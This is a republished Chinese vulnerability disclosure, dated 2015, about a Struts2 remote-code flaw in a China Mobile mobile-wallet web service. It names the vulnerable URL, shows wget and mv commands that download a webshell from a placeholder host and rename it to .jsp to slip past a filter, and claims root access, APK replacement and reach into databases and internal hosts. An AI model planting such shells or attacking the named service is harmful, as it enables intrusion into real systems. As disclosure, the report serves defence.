鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换

来源:互联网 作者:佚名 时间:2015-04-09 21:26
struts2漏洞 地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1appid=AP310000000000010634areacode=310000portaltype=0columnid=accesstype=1ext=version=3usessionid=ua=resourceid=SV310000000333backurl= 服务器

 

struts2漏洞

地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl=

服务器有限制,wget无法直接下载shell,小技巧绕过

先下载txt格式然后vm命令改成jsp

wget -P 绝对路径 http://www.xxx.com/shell.txt

mv 绝对路径/shell.txt 绝对路径/shell.jsp

root权限
 

1.png


 

root.png



可替换apk应用
 

QQ截图20150123092415.png



涉及多个数据库
 

2.png


 

3.png


 

4.png


 

5.png


 

6.png


 

7.png


 

8.png


 

9.png


 

10.png


 

11.png


 

12.png



多个业务备份
 

QQ截图20150125134800.png



多个内网机器,可继续渗透
 

QQ截图20150123125915.png


 

QQ截图20150123125939.png


 

QQ截图20150123130011.png

 

 

解决方案:

升级

上一篇:华三某管理系统后台SQL post注入漏洞(直接获取敏感数据)
下一篇:有货官方某接口设计不当可平行越权修改他人资料及订单等
网友评论
<
相关栏目
最近更新
你最喜欢的